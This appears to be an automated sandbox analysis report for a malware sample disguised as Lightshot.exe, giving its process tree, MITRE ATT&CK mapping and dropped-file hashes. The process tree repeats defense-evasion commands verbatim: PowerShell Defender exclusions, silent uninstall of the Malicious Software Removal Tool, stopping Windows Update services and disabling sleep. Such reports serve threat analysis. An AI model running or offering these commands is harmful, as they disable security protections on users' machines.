C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:1836
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:3820
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:4612
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:1656
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3544
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3736
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:2948
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:1860
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:2076
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:5320
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:2908 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5220 -ip 52202⤵PID:2664
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 420 -p 64 -ip 642⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:752
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 592 -p 316 -ip 3162⤵PID:5772
-
-
C:\ProgramData\Screenshots\Lightshot.exeC:\ProgramData\Screenshots\Lightshot.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5892 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3888 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:6508
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6524
-
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:6580
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:6516
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:6596 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6608
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:6788
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:6840
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:6884 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6892
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:6988 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7092
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:6996 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7080
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:7004
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:7012 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:7100
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:7020
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:7048
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:8292
-
-
C:\ProgramData\Screenshots\Lightshot.exe"C:\ProgramData\Screenshots\Lightshot.exe"3⤵PID:2280
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:6340
-
-
C:\ProgramData\Screenshots\Lightshot.exe"C:\ProgramData\Screenshots\Lightshot.exe"3⤵PID:6428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:1368
-
-
C:\ProgramData\Screenshots\Lightshot.exe"C:\ProgramData\Screenshots\Lightshot.exe"3⤵PID:7340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:7388
-
-
C:\ProgramData\Screenshots\Lightshot.exe"C:\ProgramData\Screenshots\Lightshot.exe"3⤵PID:7408
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:5148
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:1020
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:8856
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:7652
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:8408
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:8440
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:8400
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:8636
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
PID:9012
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
PID:4532
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
PID:8952
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
PID:7708
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵PID:5488
-
-
C:\Windows\system32\dialer.exedialer.exe4⤵PID:6136
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:9040
-
-
C:\ProgramData\Screenshots\Lightshot.exe"C:\ProgramData\Screenshots\Lightshot.exe"3⤵PID:6392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:4600
-
-
C:\ProgramData\Screenshots\Lightshot.exe"C:\ProgramData\Screenshots\Lightshot.exe"3⤵PID:6860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:4596
-
-
C:\ProgramData\Screenshots\Lightshot.exe"C:\ProgramData\Screenshots\Lightshot.exe"3⤵PID:1336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:6740
-
-
C:\ProgramData\Screenshots\Lightshot.exe"C:\ProgramData\Screenshots\Lightshot.exe"3⤵PID:6508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:9080
-
-
C:\ProgramData\Screenshots\Lightshot.exe"C:\ProgramData\Screenshots\Lightshot.exe"3⤵PID:2444
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:5760
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:4132
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:4948
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:1984
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:7588
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:4012
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:5052
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:5396
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
PID:6348
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
PID:3572
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
PID:4532
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
PID:8216
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵PID:828
-
-
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵PID:7132
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:6708
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:6372
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:6812
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3172
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:5508
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:5636
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:6808
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:6952
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:6216
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:820
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:4608
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:1108
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:6704
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:1632
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:2544
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3280
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:2288
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:4172
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3588
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:4808
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:6584
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:5944
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:536
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:7096
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:1224
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3172
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:6852
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:4108
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:2964
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:5772
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3172
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5604 -ip 56041⤵PID:7100
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5604 -ip 56041⤵PID:824
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2016 -ip 20161⤵PID:7588
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:6028
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4916 -ip 49161⤵PID:6740
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:8368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 952 -ip 9521⤵PID:7848
-
C:\ProgramData\Screenshots\Lightshot.exeC:\ProgramData\Screenshots\Lightshot.exe1⤵PID:5288
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Indicator Removal
2File Deletion
1Network Share Connection Removal
1Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Discovery
Browser Information Discovery
1Network Service Discovery
1Network Share Discovery
1Peripheral Device Discovery
1Query Registry
6Remote System Discovery
1System Information Discovery
5System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Filesize328B
MD545a92f86ef338024bfd284273775a7fe
SHA195c1bf69cbe11cd25b3d83f43d174ac0b77660f8
SHA25647bc1cd44bebb6dc0d2dc795e17bfe4b176b27ca54c449644867ec2ddd5ab706
SHA512c51e5c305beed0a26eddfc78748c4fb3001b1b3752f050f2fbee061bfc0d0803d58154a118ea6a1f4b9e344dff68e8f2ba3a2047d42192a43035755e3d9aa3f6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
Filesize330B
MD5ca4d0f7267c86d2125a44acbfc12e62c
SHA179ea4e15ec36e16761aa76671ae8974976d60849
SHA256c5a1007fdac5d1944b12b686134227b87e091d57dff446c74ec245dbf82bb37a
SHA512fef7a4f9900cd5fcd555f70b9741407fda7add6ce1b6bff31585f866477082660f50f391bec39d16ea1de8feeba2018f61bc5882c1fe944b514f6ed2af30dbeb
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\722f2a07-a548-4273-b3dd-f85bfac8eeed.dmp
Filesize515KB
MD56fa83e01965fb037898262650995d767
SHA1910984c17436095ad80e13d64b0f87fcb55f766f
SHA256bafff8db1f42b5053acb7fa3d7a1dc07b3d52f063b743ccbb261b30cb8cc347d
SHA512fef9ddfbbc13ab78eeca5192488e829ed0c00852037630f12753d45d897f366262ef82ceaf7be22e8a08c20c49191ba54ae747f2ad73b9a697b6c55920af7198
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\a423a93c-4a99-497a-a836-fea9f4714f3f.dmp
Filesize62KB
MD5c8e6894391caafbe275ef7fe734a4bdd
SHA1f545382e0a193ce31f1abf11d3932fee258b2d68
SHA256d8fc2aadc4e8066f1c68841c69da7f5cd443a2c2828839e62a7e13251cf21126
SHA512a331bd57750bf2a6a7a697244c185733527693114693f97147017aff12804cbe5139c67fab214857104835098ea756667484a2957c00f9be06a42dc92e5f2a1d
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\fffae7f4-63b7-407d-85e4-8045df21708a.dmp
Filesize62KB
MD5fba0b03f424fae1a12874876db82cb63
SHA1fb1a591cd19e379a74a3682f16eba9b1ef22cec4
SHA2569eef1f111d69293b13857be498750d5cfdad209154ad8ea519e31070316d38d6
SHA51285b77758133fa506dfe7a3cef76fb402cb77590e210fd8931ad9f5adfb9e56df2910fe0a4707081f9ab71e04617ec45ec1cab1b24307e90e1e932a2d97e242e7
-
Filesize
40B
MD5186ccc6761714f7e88de1fff069b95fb
SHA1c7dec1fff5e2f359cccf94875265f96757865b34
SHA256abb5c7113a03fa5d3a4d6d25007f875d5189c85054252a03a3c9d2cc64a5f59e
SHA5125f346abd0068d56df1bc7236a8f8ae6e0397cd35c7e8a6554f90724bc4936ed6a1f127aef797391d34ab458ba9ff3337bade05334155aae7473e6c463b0499c9
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\4e093551-83b5-4c72-ac55-80fa3030e4d4.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
649B
MD55c2baaa3e5621cee0b685ec1cccb0db1
SHA1a7ea77beb4380e029958e3853e4499cd169c8f8f
SHA256c91515a50867e6233a5fb2616a18ba13e231aec98977d361a6d31f6a63897d36
SHA512a4eadb79881c3c587932f929a6c3373ae00a378983f68fb999662b69eede236de4d7473fc934692f6608bcb013a33de361b980652aca55381356e1561368f8ba
-
Filesize
44KB
MD5da54d0f1afd5d47e82bc932a320ee867
SHA1a8d438f087fa9f364d83ca73dd99298c0ccaad42
SHA2560c8a2d69dda17394f73576d0c30c93eb5b9cb3aa13e9ebde52b524f7a1ed3ab6
SHA5127da43e8e6566be07b3878e5a1ccdbbeb70b0ca43e691bfafe11c44534da52e674e8f6e02c7e06fefe4bf35522e33d94c1390c14a8255d4c43b6346002dcdcce6
-
Filesize
264KB
MD53a3531396d3f5eb2d6908aae1788a422
SHA1942dd0d0fcd54f722c587e631e64889334b77b5b
SHA2569e366707cb8d059f6f390e5907c26e69b528098f0d21306fdd73c1a0f409112e
SHA5128c3d37e838faa5e5a57ebf855b44fe5e59a1a75b6efced01e57759a3c548b6424d8991efe3162e9cd7c537697bc12b25d2b6b061c8bd8547530a2957dbe63fb2
-
Filesize
4.0MB
MD5db9d8d134f236770b542341b025f72ea
SHA1dbd484355cab9e4c37ea4ee40cbc5f642532a464
SHA256dac22f82bcadfd9e808920432b2c18b26d96c4a74f5449bf41f119e427432190
SHA51217dbe21b19a74c162c0831e1a999db2a269696f53f3a1dddf1565987625c508f67ec971bd7d758686d506fa168d67be8331c532f4ec052466fc3726d86dee073
-
Filesize
38KB
MD5181a2f2a02b1c2eee65f73b2cf324447
SHA18032de3f2d55f8a52ac5e41472b0b54bc580b7ad
SHA2569a4eabe29791b9079fd92c1f78d68d798bc5ba12f3c4673b3c5aab0b6d8f6f9f
SHA512b73d1ff8ddf84be92788a29dd8c45e1c1a7bcccd61bb2f33b015e3c63b2eb3f807d606e5472ab1e655c6ec64491309d5ec4fb8c31d457670d989664331dcfa32
-
Filesize
51KB
MD5f61f0d4d0f968d5bba39a84c76277e1a
SHA1aa3693ea140eca418b4b2a30f6a68f6f43b4beb2
SHA25657147f08949ababe7deef611435ae418475a693e3823769a25c2a39b6ead9ccc
SHA5126c3bd90f709bcf9151c9ed9ffea55c4f6883e7fda2a4e26bf018c83fe1cfbe4f4aa0db080d6d024070d53b2257472c399c8ac44eefd38b9445640efa85d5c487
-
Filesize
106KB
MD5866625b6f04890d0339fc889512339c8
SHA128eceacf632e4178596637e3c014e1886b600f2d
SHA256fc1c2849205244e3b9f746a893ca32d4baf4f303a5e9f8567bee876331adc5bc
SHA5123a52e4ac7d05b0693d7544b71b5d656514e1687a41dc9097750be554a264cc930011cc29bf879d82d4408db8d5e8188109f6b8bc3c651c0f9ad3ce32a2e164f2
-
Filesize
3KB
MD511c0e87bfc46e7208fdec79354a5925e
SHA1074aaf78e06119d9127d3fe94fab4e21324832c0
SHA256533da5d4710015bc18fc57e59ab8191157c6cad4edbe80f6dfb158b1e9f79972
SHA51236fa3c2ec03c548a95034d83fa821e1073b23d1bcd36e6c35371ae2fcd2b6d7c36f3b1193d95ee7b1da7525f456cc7a89769b0f5185f07b2d2ce4c212ba46074
-
Filesize
264KB
MD58558f416c530c3280b40d79bdd4621ba
SHA10608c1f502f34d4e63b2a5f2d5546920a49655d0
SHA256caaacaade982d362c316c1e7a51e3cab7aa6218113d5f860fb4dd69632e8f711
SHA512c21b24576ce97bcab2105070a72e95ef326f92a119665f3d60cc6d94ac0bb922c5e5ae1266d16d57ff259e14ad4fbc2500047895341b78c970f6ef0c3cea1537
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\_locales\en\messages.json
Filesize851B
MD507ffbe5f24ca348723ff8c6c488abfb8
SHA16dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA2566895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA5127ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\dasherSettingSchema.json
Filesize854B
MD54ec1df2da46182103d2ffc3b92d20ca5
SHA1fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA2566c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_1\_locales\en_US\messages.json
Filesize1KB
MD5578215fbb8c12cb7e6cd73fbd16ec994
SHA19471d71fa6d82ce1863b74e24237ad4fd9477187
SHA256102b586b197ea7d6edfeb874b97f95b05d229ea6a92780ea8544c4ff1e6bc5b1
SHA512e698b1a6a6ed6963182f7d25ac12c6de06c45d14499ddc91e81bdb35474e7ec9071cfebd869b7d129cb2cd127bc1442c75e408e21eb8e5e6906a607a3982b212
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_1\manifest.json
Filesize2KB
MD55e425dc36364927b1348f6c48b68c948
SHA19e411b88453def3f7cfcb3eaa543c69ad832b82f
SHA25632d9c8de71a40d71fc61ad52aa07e809d07df57a2f4f7855e8fc300f87ffc642
SHA512c19217b9af82c1ee1015d4dfc4234a5ce0a4e482430455abaafae3f9c8ae0f7e5d2ed7727502760f1b0656f0a079cb23b132188ae425e001802738a91d8c5d79
-
